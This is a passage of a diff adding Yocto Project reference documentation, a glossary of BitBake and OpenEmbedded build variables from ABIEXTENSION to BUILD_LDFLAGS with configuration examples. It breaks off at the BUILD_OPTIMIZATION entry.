+:term:`N <NATIVELSBSTRING>` :term:`O <OBJCOPY>` :term:`P`
+:term:`R <RANLIB>` :term:`S` :term:`T`
+:term:`U <UBOOT_CONFIG>` :term:`V <VOLATILE_LOG_DIR>`
+:term:`W <WARN_QA>` :term:`X <XSERVER>`
+
+.. glossary::
+
+ :term:`ABIEXTENSION`
+ Extension to the Application Binary Interface (ABI) field of the GNU
+ canonical architecture name (e.g. "eabi").
+
+ ABI extensions are set in the machine include files. For example, the
+ ``meta/conf/machine/include/arm/arch-arm.inc`` file sets the
+ following extension:
+ ::
+
+ ABIEXTENSION = "eabi"
+
+ :term:`ALLOW_EMPTY`
+ Specifies whether to produce an output package even if it is empty.
+ By default, BitBake does not produce empty packages. This default
+ behavior can cause issues when there is an
+ :term:`RDEPENDS` or some other hard runtime
+ requirement on the existence of the package.
+
+ Like all package-controlling variables, you must always use them in
+ conjunction with a package name override, as in:
+ ::
+
+ ALLOW_EMPTY_${PN} = "1"
+ ALLOW_EMPTY_${PN}-dev = "1"
+ ALLOW_EMPTY_${PN}-staticdev = "1"
+
+ :term:`ALTERNATIVE`
+ Lists commands in a package that need an alternative binary naming
+ scheme. Sometimes the same command is provided in multiple packages.
+ When this occurs, the OpenEmbedded build system needs to use the
+ alternatives system to create a different binary naming scheme so the
+ commands can co-exist.
+
+ To use the variable, list out the package's commands that also exist
+ as part of another package. For example, if the ``busybox`` package
+ has four commands that also exist as part of another package, you
+ identify them as follows:
+ ::
+
+ ALTERNATIVE_busybox = "sh sed test bracket"
+
+ For more information on the alternatives system, see the
+ ":ref:`update-alternatives.bbclass <ref-classes-update-alternatives>`"
+ section.
+
+ :term:`ALTERNATIVE_LINK_NAME`
+ Used by the alternatives system to map duplicated commands to actual
+ locations. For example, if the ``bracket`` command provided by the
+ ``busybox`` package is duplicated through another package, you must
+ use the ``ALTERNATIVE_LINK_NAME`` variable to specify the actual
+ location:
+ ::
+
+ ALTERNATIVE_LINK_NAME[bracket] = "/usr/bin/["
+
+ In this example, the binary for the ``bracket`` command (i.e. ``[``)
+ from the ``busybox`` package resides in ``/usr/bin/``.
+
+ .. note::
+
+ If ``ALTERNATIVE_LINK_NAME`` is not defined, it defaults to ``${bindir}/name``.
+
+ For more information on the alternatives system, see the
+ ":ref:`update-alternatives.bbclass <ref-classes-update-alternatives>`"
+ section.
+
+ :term:`ALTERNATIVE_PRIORITY`
+ Used by the alternatives system to create default priorities for
+ duplicated commands. You can use the variable to create a single
+ default regardless of the command name or package, a default for
+ specific duplicated commands regardless of the package, or a default
+ for specific commands tied to particular packages. Here are the
+ available syntax forms:
+ ::
+
+ ALTERNATIVE_PRIORITY = "priority"
+ ALTERNATIVE_PRIORITY[name] = "priority"
+ ALTERNATIVE_PRIORITY_pkg[name] = "priority"
+
+ For more information on the alternatives system, see the
+ ":ref:`update-alternatives.bbclass <ref-classes-update-alternatives>`"
+ section.
+
+ :term:`ALTERNATIVE_TARGET`
+ Used by the alternatives system to create default link locations for
+ duplicated commands. You can use the variable to create a single
+ default location for all duplicated commands regardless of the
+ command name or package, a default for specific duplicated commands
+ regardless of the package, or a default for specific commands tied to
+ particular packages. Here are the available syntax forms:
+ ::
+
+ ALTERNATIVE_TARGET = "target"
+ ALTERNATIVE_TARGET[name] = "target"
+ ALTERNATIVE_TARGET_pkg[name] = "target"
+
+ .. note::
+
+ If ``ALTERNATIVE_TARGET`` is not defined, it inherits the value
+ from the :term:`ALTERNATIVE_LINK_NAME` variable.
+
+ If ``ALTERNATIVE_LINK_NAME`` and ``ALTERNATIVE_TARGET`` are the
+ same, the target for ``ALTERNATIVE_TARGET`` has "``.{BPN}``"
+ appended to it.
+
+ Finally, if the file referenced has not been renamed, the
+ alternatives system will rename it to avoid the need to rename
+ alternative files in the :ref:`ref-tasks-install`
+ task while retaining support for the command if necessary.
+
+ For more information on the alternatives system, see the
+ ":ref:`update-alternatives.bbclass <ref-classes-update-alternatives>`"
+ section.
+
+ :term:`ANY_OF_DISTRO_FEATURES`
+ When inheriting the
+ :ref:`features_check <ref-classes-features_check>`
+ class, this variable identifies a list of distribution features where
+ at least one must be enabled in the current configuration in order
+ for the OpenEmbedded build system to build the recipe. In other words,
+ if none of the features listed in ``ANY_OF_DISTRO_FEATURES``
+ appear in ``DISTRO_FEATURES`` within the current configuration, then
+ the recipe will be skipped, and if the build system attempts to build
+ the recipe then an error will be triggered.
+
+
+ :term:`APPEND`
+ An override list of append strings for each target specified with
+ :term:`LABELS`.
+
+ See the :ref:`grub-efi <ref-classes-grub-efi>` class for more
+ information on how this variable is used.
+
+ :term:`AR`
+ The minimal command and arguments used to run ``ar``.
+
+ :term:`ARCHIVER_MODE`
+ When used with the :ref:`archiver <ref-classes-archiver>` class,
+ determines the type of information used to create a released archive.
+ You can use this variable to create archives of patched source,
+ original source, configured source, and so forth by employing the
+ following variable flags (varflags):
+ ::
+
+ ARCHIVER_MODE[src] = "original" # Uses original (unpacked) source files.
+ ARCHIVER_MODE[src] = "patched" # Uses patched source files. This is the default.
+ ARCHIVER_MODE[src] = "configured" # Uses configured source files.
+ ARCHIVER_MODE[diff] = "1" # Uses patches between do_unpack and do_patch.
+ ARCHIVER_MODE[diff-exclude] ?= "file file ..." # Lists files and directories to exclude from diff.
+ ARCHIVER_MODE[dumpdata] = "1" # Uses environment data.
+ ARCHIVER_MODE[recipe] = "1" # Uses recipe and include files.
+ ARCHIVER_MODE[srpm] = "1" # Uses RPM package files.
+
+ For information on how the variable works, see the
+ ``meta/classes/archiver.bbclass`` file in the :term:`Source Directory`.
+
+ :term:`AS`
+ Minimal command and arguments needed to run the assembler.
+
+ :term:`ASSUME_PROVIDED`
+ Lists recipe names (:term:`PN` values) BitBake does not
+ attempt to build. Instead, BitBake assumes these recipes have already
+ been built.
+
+ In OpenEmbedded-Core, ``ASSUME_PROVIDED`` mostly specifies native
+ tools that should not be built. An example is ``git-native``, which
+ when specified, allows for the Git binary from the host to be used
+ rather than building ``git-native``.
+
+ :term:`ASSUME_SHLIBS`
+ Provides additional ``shlibs`` provider mapping information, which
+ adds to or overwrites the information provided automatically by the
+ system. Separate multiple entries using spaces.
+
+ As an example, use the following form to add an ``shlib`` provider of
+ shlibname in packagename with the optional version:
+ ::
+
+ shlibname:packagename[_version]
+
+ Here is an example that adds a shared library named ``libEGL.so.1``
+ as being provided by the ``libegl-implementation`` package:
+ ::
+
+ ASSUME_SHLIBS = "libEGL.so.1:libegl-implementation"
+
+ :term:`AUTHOR`
+ The email address used to contact the original author or authors in
+ order to send patches and forward bugs.
+
+ :term:`AUTO_LIBNAME_PKGS`
+ When the :ref:`debian <ref-classes-debian>` class is inherited,
+ which is the default behavior, ``AUTO_LIBNAME_PKGS`` specifies which
+ packages should be checked for libraries and renamed according to
+ Debian library package naming.
+
+ The default value is "${PACKAGES}", which causes the debian class to
+ act on all packages that are explicitly generated by the recipe.
+
+ :term:`AUTO_SYSLINUXMENU`
+ Enables creating an automatic menu for the syslinux bootloader. You
+ must set this variable in your recipe. The
+ :ref:`syslinux <ref-classes-syslinux>` class checks this variable.
+
+ :term:`AUTOREV`
+ When ``SRCREV`` is set to the value of this variable, it specifies to
+ use the latest source revision in the repository. Here is an example:
+ ::
+
+ SRCREV = "${AUTOREV}"
+
+ If you use the previous statement to retrieve the latest version of
+ software, you need to be sure :term:`PV` contains
+ ``${``\ :term:`SRCPV`\ ``}``. For example, suppose you
+ have a kernel recipe that inherits the
+ :ref:`kernel <ref-classes-kernel>` class and you use the previous
+ statement. In this example, ``${SRCPV}`` does not automatically get
+ into ``PV``. Consequently, you need to change ``PV`` in your recipe
+ so that it does contain ``${SRCPV}``.
+
+ For more information see the
+ ":ref:`dev-manual/dev-manual-common-tasks:automatically incrementing a package version number`"
+ section in the Yocto Project Development Tasks Manual.
+
+ :term:`AVAILABLE_LICENSES`
+ List of licenses found in the directories specified by
+ :term:`COMMON_LICENSE_DIR` and
+ :term:`LICENSE_PATH`.
+
+ .. note::
+
+ It is assumed that all changes to ``COMMON_LICENSE_DIR`` and
+ ``LICENSE_PATH`` have been done before ``AVAILABLE_LICENSES``
+ is defined (in :ref:`ref-classes-license`).
+
+ :term:`AVAILTUNES`
+ The list of defined CPU and Application Binary Interface (ABI)
+ tunings (i.e. "tunes") available for use by the OpenEmbedded build
+ system.
+
+ The list simply presents the tunes that are available. Not all tunes
+ may be compatible with a particular machine configuration, or with
+ each other in a
+ :ref:`Multilib <dev-manual/dev-manual-common-tasks:combining multiple versions of library files into one image>`
+ configuration.
+
+ To add a tune to the list, be sure to append it with spaces using the
+ "+=" BitBake operator. Do not simply replace the list by using the
+ "=" operator. See the
+ ":ref:`Basic Syntax <bitbake:bitbake-user-manual/bitbake-user-manual-metadata:basic syntax>`" section in the BitBake
+ User Manual for more information.
+
+ :term:`B`
+ The directory within the :term:`Build Directory` in
+ which the OpenEmbedded build system places generated objects during a
+ recipe's build process. By default, this directory is the same as the
+ :term:`S` directory, which is defined as:
+ ::
+
+ S = "${WORKDIR}/${BP}"
+
+ You can separate the (``S``) directory and the directory pointed to
+ by the ``B`` variable. Most Autotools-based recipes support
+ separating these directories. The build system defaults to using
+ separate directories for ``gcc`` and some kernel recipes.
+
+ :term:`BAD_RECOMMENDATIONS`
+ Lists "recommended-only" packages to not install. Recommended-only
+ packages are packages installed only through the
+ :term:`RRECOMMENDS` variable. You can prevent any
+ of these "recommended" packages from being installed by listing them
+ with the ``BAD_RECOMMENDATIONS`` variable:
+ ::
+
+ BAD_RECOMMENDATIONS = "package_name package_name package_name ..."
+
+ You can set this variable globally in your ``local.conf`` file or you
+ can attach it to a specific image recipe by using the recipe name
+ override:
+ ::
+
+ BAD_RECOMMENDATIONS_pn-target_image = "package_name"
+
+ It is important to realize that if you choose to not install packages
+ using this variable and some other packages are dependent on them
+ (i.e. listed in a recipe's :term:`RDEPENDS`
+ variable), the OpenEmbedded build system ignores your request and
+ will install the packages to avoid dependency errors.
+
+ Support for this variable exists only when using the IPK and RPM
+ packaging backend. Support does not exist for DEB.
+
+ See the :term:`NO_RECOMMENDATIONS` and the
+ :term:`PACKAGE_EXCLUDE` variables for related
+ information.
+
+ :term:`BASE_LIB`
+ The library directory name for the CPU or Application Binary
+ Interface (ABI) tune. The ``BASE_LIB`` applies only in the Multilib
+ context. See the ":ref:`dev-manual/dev-manual-common-tasks:combining multiple versions of library files into one image`"
+ section in the Yocto Project Development Tasks Manual for information
+ on Multilib.
+
+ The ``BASE_LIB`` variable is defined in the machine include files in
+ the :term:`Source Directory`. If Multilib is not
+ being used, the value defaults to "lib".
+
+ :term:`BASE_WORKDIR`
+ Points to the base of the work directory for all recipes. The default
+ value is "${TMPDIR}/work".
+
+ :term:`BB_ALLOWED_NETWORKS`
+ Specifies a space-delimited list of hosts that the fetcher is allowed
+ to use to obtain the required source code. Following are
+ considerations surrounding this variable:
+
+ - This host list is only used if ``BB_NO_NETWORK`` is either not set
+ or set to "0".
+
+ - Limited support for wildcard matching against the beginning of
+ host names exists. For example, the following setting matches
+ ``git.gnu.org``, ``ftp.gnu.org``, and ``foo.git.gnu.org``.
+ ::
+
+ BB_ALLOWED_NETWORKS = "*.gnu.org"
+
+ .. note::
+
+ The use of the "``*``" character only works at the beginning of
+ a host name and it must be isolated from the remainder of the
+ host name. You cannot use the wildcard character in any other
+ location of the name or combined with the front part of the
+ name.
+
+ For example, ``*.foo.bar`` is supported, while ``*aa.foo.bar``
+ is not.
+
+ - Mirrors not in the host list are skipped and logged in debug.
+
+ - Attempts to access networks not in the host list cause a failure.
+
+ Using ``BB_ALLOWED_NETWORKS`` in conjunction with
+ :term:`PREMIRRORS` is very useful. Adding the host
+ you want to use to ``PREMIRRORS`` results in the source code being
+ fetched from an allowed location and avoids raising an error when a
+ host that is not allowed is in a :term:`SRC_URI`
+ statement. This is because the fetcher does not attempt to use the
+ host listed in ``SRC_URI`` after a successful fetch from the
+ ``PREMIRRORS`` occurs.
+
+ :term:`BB_DANGLINGAPPENDS_WARNONLY`
+ Defines how BitBake handles situations where an append file
+ (``.bbappend``) has no corresponding recipe file (``.bb``). This
+ condition often occurs when layers get out of sync (e.g. ``oe-core``
+ bumps a recipe version and the old recipe no longer exists and the
+ other layer has not been updated to the new version of the recipe
+ yet).
+
+ The default fatal behavior is safest because it is the sane reaction
+ given something is out of sync. It is important to realize when your
+ changes are no longer being applied.
+
+ You can change the default behavior by setting this variable to "1",
+ "yes", or "true" in your ``local.conf`` file, which is located in the
+ :term:`Build Directory`: Here is an example:
+ ::
+
+ BB_DANGLINGAPPENDS_WARNONLY = "1"
+
+ :term:`BB_DISKMON_DIRS`
+ Monitors disk space and available inodes during the build and allows
+ you to control the build based on these parameters.
+
+ Disk space monitoring is disabled by default. To enable monitoring,
+ add the ``BB_DISKMON_DIRS`` variable to your ``conf/local.conf`` file
+ found in the :term:`Build Directory`. Use the
+ following form:
+
+ .. code-block:: none
+
+ BB_DISKMON_DIRS = "action,dir,threshold [...]"
+
+ where:
+
+ action is:
+ ABORT: Immediately abort the build when
+ a threshold is broken.
+ STOPTASKS: Stop the build after the currently
+ executing tasks have finished when
+ a threshold is broken.
+ WARN: Issue a warning but continue the
+ build when a threshold is broken.
+ Subsequent warnings are issued as
+ defined by the BB_DISKMON_WARNINTERVAL
+ variable, which must be defined in
+ the conf/local.conf file.
+
+ dir is:
+ Any directory you choose. You can specify one or
+ more directories to monitor by separating the
+ groupings with a space. If two directories are
+ on the same device, only the first directory
+ is monitored.
+
+ threshold is:
+ Either the minimum available disk space,
+ the minimum number of free inodes, or
+ both. You must specify at least one. To
+ omit one or the other, simply omit the value.
+ Specify the threshold using G, M, K for Gbytes,
+ Mbytes, and Kbytes, respectively. If you do
+ not specify G, M, or K, Kbytes is assumed by
+ default. Do not use GB, MB, or KB.
+
+ Here are some examples:
+ ::
+
+ BB_DISKMON_DIRS = "ABORT,${TMPDIR},1G,100K WARN,${SSTATE_DIR},1G,100K"
+ BB_DISKMON_DIRS = "STOPTASKS,${TMPDIR},1G"
+ BB_DISKMON_DIRS = "ABORT,${TMPDIR},,100K"
+
+ The first example works only if you also provide the
+ :term:`BB_DISKMON_WARNINTERVAL`
+ variable in the ``conf/local.conf``. This example causes the build
+ system to immediately abort when either the disk space in
+ ``${TMPDIR}`` drops below 1 Gbyte or the available free inodes drops
+ below 100 Kbytes. Because two directories are provided with the
+ variable, the build system also issue a warning when the disk space
+ in the ``${SSTATE_DIR}`` directory drops below 1 Gbyte or the number
+ of free inodes drops below 100 Kbytes. Subsequent warnings are issued
+ during intervals as defined by the ``BB_DISKMON_WARNINTERVAL``
+ variable.
+
+ The second example stops the build after all currently executing
+ tasks complete when the minimum disk space in the ``${TMPDIR}``
+ directory drops below 1 Gbyte. No disk monitoring occurs for the free
+ inodes in this case.
+
+ The final example immediately aborts the build when the number of
+ free inodes in the ``${TMPDIR}`` directory drops below 100 Kbytes. No
+ disk space monitoring for the directory itself occurs in this case.
+
+ :term:`BB_DISKMON_WARNINTERVAL`
+ Defines the disk space and free inode warning intervals. To set these
+ intervals, define the variable in your ``conf/local.conf`` file in
+ the :term:`Build Directory`.
+
+ If you are going to use the ``BB_DISKMON_WARNINTERVAL`` variable, you
+ must also use the :term:`BB_DISKMON_DIRS`
+ variable and define its action as "WARN". During the build,
+ subsequent warnings are issued each time disk space or number of free
+ inodes further reduces by the respective interval.
+
+ If you do not provide a ``BB_DISKMON_WARNINTERVAL`` variable and you
+ do use ``BB_DISKMON_DIRS`` with the "WARN" action, the disk
+ monitoring interval defaults to the following:
+ ::
+
+ BB_DISKMON_WARNINTERVAL = "50M,5K"
+
+ When specifying the variable in your configuration file, use the
+ following form:
+
+ .. code-block:: none
+
+ BB_DISKMON_WARNINTERVAL = "disk_space_interval,disk_inode_interval"
+
+ where:
+
+ disk_space_interval is:
+ An interval of memory expressed in either
+ G, M, or K for Gbytes, Mbytes, or Kbytes,
+ respectively. You cannot use GB, MB, or KB.
+
+ disk_inode_interval is:
+ An interval of free inodes expressed in either
+ G, M, or K for Gbytes, Mbytes, or Kbytes,
+ respectively. You cannot use GB, MB, or KB.
+
+ Here is an example:
+ ::
+
+ BB_DISKMON_DIRS = "WARN,${SSTATE_DIR},1G,100K"
+ BB_DISKMON_WARNINTERVAL = "50M,5K"
+
+ These variables cause the
+ OpenEmbedded build system to issue subsequent warnings each time the
+ available disk space further reduces by 50 Mbytes or the number of
+ free inodes further reduces by 5 Kbytes in the ``${SSTATE_DIR}``
+ directory. Subsequent warnings based on the interval occur each time
+ a respective interval is reached beyond the initial warning (i.e. 1
+ Gbytes and 100 Kbytes).
+
+ :term:`BB_GENERATE_MIRROR_TARBALLS`
+ Causes tarballs of the source control repositories (e.g. Git
+ repositories), including metadata, to be placed in the
+ :term:`DL_DIR` directory.
+
+ For performance reasons, creating and placing tarballs of these
+ repositories is not the default action by the OpenEmbedded build
+ system.
+ ::
+
+ BB_GENERATE_MIRROR_TARBALLS = "1"
+
+ Set this variable in your
+ ``local.conf`` file in the :term:`Build Directory`.
+
+ Once you have the tarballs containing your source files, you can
+ clean up your ``DL_DIR`` directory by deleting any Git or other
+ source control work directories.
+
+ :term:`BB_NUMBER_THREADS`
+ The maximum number of tasks BitBake should run in parallel at any one
+ time. The OpenEmbedded build system automatically configures this
+ variable to be equal to the number of cores on the build system. For
+ example, a system with a dual core processor that also uses
+ hyper-threading causes the ``BB_NUMBER_THREADS`` variable to default
+ to "4".
+
+ For single socket systems (i.e. one CPU), you should not have to
+ override this variable to gain optimal parallelism during builds.
+ However, if you have very large systems that employ multiple physical
+ CPUs, you might want to make sure the ``BB_NUMBER_THREADS`` variable
+ is not set higher than "20".
+
+ For more information on speeding up builds, see the
+ ":ref:`dev-manual/dev-manual-common-tasks:speeding up a build`"
+ section in the Yocto Project Development Tasks Manual.
+
+ :term:`BB_SERVER_TIMEOUT`
+ Specifies the time (in seconds) after which to unload the BitBake
+ server due to inactivity. Set ``BB_SERVER_TIMEOUT`` to determine how
+ long the BitBake server stays resident between invocations.
+
+ For example, the following statement in your ``local.conf`` file
+ instructs the server to be unloaded after 20 seconds of inactivity:
+ ::
+
+ BB_SERVER_TIMEOUT = "20"
+
+ If you want the server to never be unloaded,
+ set ``BB_SERVER_TIMEOUT`` to "-1".
+
+ :term:`BBCLASSEXTEND`
+ Allows you to extend a recipe so that it builds variants of the
+ software. Common variants for recipes exist such as "natives" like
+ ``quilt-native``, which is a copy of Quilt built to run on the build
+ system; "crosses" such as ``gcc-cross``, which is a compiler built to
+ run on the build machine but produces binaries that run on the target
+ :term:`MACHINE`; "nativesdk", which targets the SDK
+ machine instead of ``MACHINE``; and "mulitlibs" in the form
+ "``multilib:``\ multilib_name".
+
+ To build a different variant of the recipe with a minimal amount of
+ code, it usually is as simple as adding the following to your recipe:
+ ::
+
+ BBCLASSEXTEND =+ "native nativesdk"
+ BBCLASSEXTEND =+ "multilib:multilib_name"
+
+ .. note::
+
+ Internally, the ``BBCLASSEXTEND`` mechanism generates recipe
+ variants by rewriting variable values and applying overrides such
+ as ``_class-native``. For example, to generate a native version of
+ a recipe, a :term:`DEPENDS` on "foo" is rewritten
+ to a ``DEPENDS`` on "foo-native".
+
+ Even when using ``BBCLASSEXTEND``, the recipe is only parsed once.
+ Parsing once adds some limitations. For example, it is not
+ possible to include a different file depending on the variant,
+ since ``include`` statements are processed when the recipe is
+ parsed.
+
+ :term:`BBFILE_COLLECTIONS`
+ Lists the names of configured layers. These names are used to find
+ the other ``BBFILE_*`` variables. Typically, each layer will append
+ its name to this variable in its ``conf/layer.conf`` file.
+
+ :term:`BBFILE_PATTERN`
+ Variable that expands to match files from
+ :term:`BBFILES` in a particular layer. This variable
+ is used in the ``conf/layer.conf`` file and must be suffixed with the
+ name of the specific layer (e.g. ``BBFILE_PATTERN_emenlow``).
+
+ :term:`BBFILE_PRIORITY`
+ Assigns the priority for recipe files in each layer.
+
+ This variable is useful in situations where the same recipe appears
+ in more than one layer. Setting this variable allows you to
+ prioritize a layer against other layers that contain the same recipe
+ - effectively letting you control the precedence for the multiple
+ layers. The precedence established through this variable stands
+ regardless of a recipe's version (:term:`PV` variable). For
+ example, a layer that has a recipe with a higher ``PV`` value but for
+ which the ``BBFILE_PRIORITY`` is set to have a lower precedence still
+ has a lower precedence.
+
+ A larger value for the ``BBFILE_PRIORITY`` variable results in a
+ higher precedence. For example, the value 6 has a higher precedence
+ than the value 5. If not specified, the ``BBFILE_PRIORITY`` variable
+ is set based on layer dependencies (see the ``LAYERDEPENDS`` variable
+ for more information. The default priority, if unspecified for a
+ layer with no dependencies, is the lowest defined priority + 1 (or 1
+ if no priorities are defined).
+
+ .. tip::
+
+ You can use the command ``bitbake-layers show-layers``
+ to list all configured layers along with their priorities.
+
+ :term:`BBFILES`
+ A space-separated list of recipe files BitBake uses to build
+ software.
+
+ When specifying recipe files, you can pattern match using Python's
+ `glob <https://docs.python.org/3/library/glob.html>`_ syntax.
+ For details on the syntax, see the documentation by following the
+ previous link.
+
+ :term:`BBFILES_DYNAMIC`
+ Activates content when identified layers are present. You identify
+ the layers by the collections that the layers define.
+
+ Use the ``BBFILES_DYNAMIC`` variable to avoid ``.bbappend`` files
+ whose corresponding ``.bb`` file is in a layer that attempts to
+ modify other layers through ``.bbappend`` but does not want to
+ introduce a hard dependency on those other layers.
+
+ Use the following form for ``BBFILES_DYNAMIC``:
+ collection_name:filename_pattern The following example identifies two
+ collection names and two filename patterns:
+ ::
+
+ BBFILES_DYNAMIC += " \
+ clang-layer:${LAYERDIR}/bbappends/meta-clang/*/*/*.bbappend \
+ core:${LAYERDIR}/bbappends/openembedded-core/meta/*/*/*.bbappend \
+ "
+
+ This next example shows an error message that occurs because invalid
+ entries are found, which cause parsing to abort:
+
+ .. code-block:: none
+
+ ERROR: BBFILES_DYNAMIC entries must be of the form <collection name>:<filename pattern>, not:
+ /work/my-layer/bbappends/meta-security-isafw/*/*/*.bbappend
+ /work/my-layer/bbappends/openembedded-core/meta/*/*/*.bbappend
+
+ :term:`BBINCLUDELOGS`
+ Variable that controls how BitBake displays logs on build failure.
+
+ :term:`BBINCLUDELOGS_LINES`
+ If :term:`BBINCLUDELOGS` is set, specifies the
+ maximum number of lines from the task log file to print when
+ reporting a failed task. If you do not set ``BBINCLUDELOGS_LINES``,
+ the entire log is printed.
+
+ :term:`BBLAYERS`
+ Lists the layers to enable during the build. This variable is defined
+ in the ``bblayers.conf`` configuration file in the :term:`Build Directory`.
+ Here is an example:
+ ::
+
+ BBLAYERS = " \
+ /home/scottrif/poky/meta \
+ /home/scottrif/poky/meta-poky \
+ /home/scottrif/poky/meta-yocto-bsp \
+ /home/scottrif/poky/meta-mykernel \
+ "
+
+ This example enables four layers, one of which is a custom,
+ user-defined layer named ``meta-mykernel``.
+
+ :term:`BBMASK`
+ Prevents BitBake from processing recipes and recipe append files.
+
+ You can use the ``BBMASK`` variable to "hide" these ``.bb`` and
+ ``.bbappend`` files. BitBake ignores any recipe or recipe append
+ files that match any of the expressions. It is as if BitBake does not
+ see them at all. Consequently, matching files are not parsed or
+ otherwise used by BitBake.
+
+ The values you provide are passed to Python's regular expression
+ compiler. Consequently, the syntax follows Python's Regular
+ Expression (re) syntax. The expressions are compared against the full
+ paths to the files. For complete syntax information, see Python's
+ documentation at https://docs.python.org/3/library/re.html#regular-expression-syntax.
+
+ The following example uses a complete regular expression to tell
+ BitBake to ignore all recipe and recipe append files in the
+ ``meta-ti/recipes-misc/`` directory:
+ ::
+
+ BBMASK = "meta-ti/recipes-misc/"
+
+ If you want to mask out multiple directories or recipes, you can
+ specify multiple regular expression fragments. This next example
+ masks out multiple directories and individual recipes: ::
+
+ BBMASK += "/meta-ti/recipes-misc/ meta-ti/recipes-ti/packagegroup/"
+ BBMASK += "/meta-oe/recipes-support/"
+ BBMASK += "/meta-foo/.*/openldap"
+ BBMASK += "opencv.*\.bbappend"
+ BBMASK += "lzma"
+
+ .. note::
+
+ When specifying a directory name, use the trailing slash character
+ to ensure you match just that directory name.
+
+ :term:`BBMULTICONFIG`
+ Specifies each additional separate configuration when you are
+ building targets with multiple configurations. Use this variable in
+ your ``conf/local.conf`` configuration file. Specify a
+ multiconfigname for each configuration file you are using. For
+ example, the following line specifies three configuration files:
+ ::
+
+ BBMULTICONFIG = "configA configB configC"
+
+ Each configuration file you
+ use must reside in the :term:`Build Directory`
+ ``conf/multiconfig`` directory (e.g.
+ build_directory\ ``/conf/multiconfig/configA.conf``).
+
+ For information on how to use ``BBMULTICONFIG`` in an environment
+ that supports building targets with multiple configurations, see the
+ ":ref:`dev-building-images-for-multiple-targets-using-multiple-configurations`"
+ section in the Yocto Project Development Tasks Manual.
+
+ :term:`BBPATH`
+ Used by BitBake to locate ``.bbclass`` and configuration files. This
+ variable is analogous to the ``PATH`` variable.
+
+ .. note::
+
+ If you run BitBake from a directory outside of the
+ Build Directory
+ , you must be sure to set
+ BBPATH
+ to point to the Build Directory. Set the variable as you would any
+ environment variable and then run BitBake:
+ ::
+
+ $ BBPATH = "build_directory"
+ $ export BBPATH
+ $ bitbake target
+
+
+ :term:`BBSERVER`
+ If defined in the BitBake environment, ``BBSERVER`` points to the
+ BitBake remote server.
+
+ Use the following format to export the variable to the BitBake
+ environment:
+ ::
+
+ export BBSERVER=localhost:$port
+
+ By default, ``BBSERVER`` also appears in
+ :term:`bitbake:BB_HASHBASE_WHITELIST`.
+ Consequently, ``BBSERVER`` is excluded from checksum and dependency
+ data.
+
+ :term:`BINCONFIG`
+ When inheriting the
+ :ref:`binconfig-disabled <ref-classes-binconfig-disabled>` class,
+ this variable specifies binary configuration scripts to disable in
+ favor of using ``pkg-config`` to query the information. The
+ ``binconfig-disabled`` class will modify the specified scripts to
+ return an error so that calls to them can be easily found and
+ replaced.
+
+ To add multiple scripts, separate them by spaces. Here is an example
+ from the ``libpng`` recipe:
+ ::
+
+ BINCONFIG = "${bindir}/libpng-config ${bindir}/libpng16-config"
+
+ :term:`BINCONFIG_GLOB`
+ When inheriting the :ref:`binconfig <ref-classes-binconfig>` class,
+ this variable specifies a wildcard for configuration scripts that
+ need editing. The scripts are edited to correct any paths that have
+ been set up during compilation so that they are correct for use when
+ installed into the sysroot and called by the build processes of other
+ recipes.
+
+ .. note::
+
+ The ``BINCONFIG_GLOB`` variable uses
+ `shell globbing <https://tldp.org/LDP/abs/html/globbingref.html>`__,
+ which is recognition and expansion of wildcards during pattern
+ matching. Shell globbing is very similar to
+ `fnmatch <https://docs.python.org/3/library/fnmatch.html#module-fnmatch>`__
+ and `glob <https://docs.python.org/3/library/glob.html>`__.
+
+ For more information on how this variable works, see
+ ``meta/classes/binconfig.bbclass`` in the :term:`Source Directory`.
+ You can also find general
+ information on the class in the
+ ":ref:`binconfig.bbclass <ref-classes-binconfig>`" section.
+
+ :term:`BP`
+ The base recipe name and version but without any special recipe name
+ suffix (i.e. ``-native``, ``lib64-``, and so forth). ``BP`` is
+ comprised of the following:
+ ::
+
+ ${BPN}-${PV}
+
+ :term:`BPN`
+ This variable is a version of the :term:`PN` variable with
+ common prefixes and suffixes removed, such as ``nativesdk-``,
+ ``-cross``, ``-native``, and multilib's ``lib64-`` and ``lib32-``.
+ The exact lists of prefixes and suffixes removed are specified by the
+ :term:`MLPREFIX` and
+ :term:`SPECIAL_PKGSUFFIX` variables,
+ respectively.
+
+ :term:`BUGTRACKER`
+ Specifies a URL for an upstream bug tracking website for a recipe.
+ The OpenEmbedded build system does not use this variable. Rather, the
+ variable is a useful pointer in case a bug in the software being
+ built needs to be manually reported.
+
+ :term:`BUILD_ARCH`
+ Specifies the architecture of the build host (e.g. ``i686``). The
+ OpenEmbedded build system sets the value of ``BUILD_ARCH`` from the
+ machine name reported by the ``uname`` command.
+
+ :term:`BUILD_AS_ARCH`
+ Specifies the architecture-specific assembler flags for the build
+ host. By default, the value of ``BUILD_AS_ARCH`` is empty.
+
+ :term:`BUILD_CC_ARCH`
+ Specifies the architecture-specific C compiler flags for the build
+ host. By default, the value of ``BUILD_CC_ARCH`` is empty.
+
+ :term:`BUILD_CCLD`
+ Specifies the linker command to be used for the build host when the C
+ compiler is being used as the linker. By default, ``BUILD_CCLD``
+ points to GCC and passes as arguments the value of
+ :term:`BUILD_CC_ARCH`, assuming
+ ``BUILD_CC_ARCH`` is set.
+
+ :term:`BUILD_CFLAGS`
+ Specifies the flags to pass to the C compiler when building for the
+ build host. When building in the ``-native`` context,
+ :term:`CFLAGS` is set to the value of this variable by
+ default.
+
+ :term:`BUILD_CPPFLAGS`
+ Specifies the flags to pass to the C preprocessor (i.e. to both the C
+ and the C++ compilers) when building for the build host. When
+ building in the ``-native`` context, :term:`CPPFLAGS`
+ is set to the value of this variable by default.
+
+ :term:`BUILD_CXXFLAGS`
+ Specifies the flags to pass to the C++ compiler when building for the
+ build host. When building in the ``-native`` context,
+ :term:`CXXFLAGS` is set to the value of this variable
+ by default.
+
+ :term:`BUILD_FC`
+ Specifies the Fortran compiler command for the build host. By
+ default, ``BUILD_FC`` points to Gfortran and passes as arguments the
+ value of :term:`BUILD_CC_ARCH`, assuming
+ ``BUILD_CC_ARCH`` is set.
+
+ :term:`BUILD_LD`
+ Specifies the linker command for the build host. By default,
+ ``BUILD_LD`` points to the GNU linker (ld) and passes as arguments
+ the value of :term:`BUILD_LD_ARCH`, assuming
+ ``BUILD_LD_ARCH`` is set.
+
+ :term:`BUILD_LD_ARCH`
+ Specifies architecture-specific linker flags for the build host. By
+ default, the value of ``BUILD_LD_ARCH`` is empty.
+
+ :term:`BUILD_LDFLAGS`
+ Specifies the flags to pass to the linker when building for the build
+ host. When building in the ``-native`` context,
+ :term:`LDFLAGS` is set to the value of this variable
+ by default.
+
+ :term:`BUILD_OPTIMIZATION`
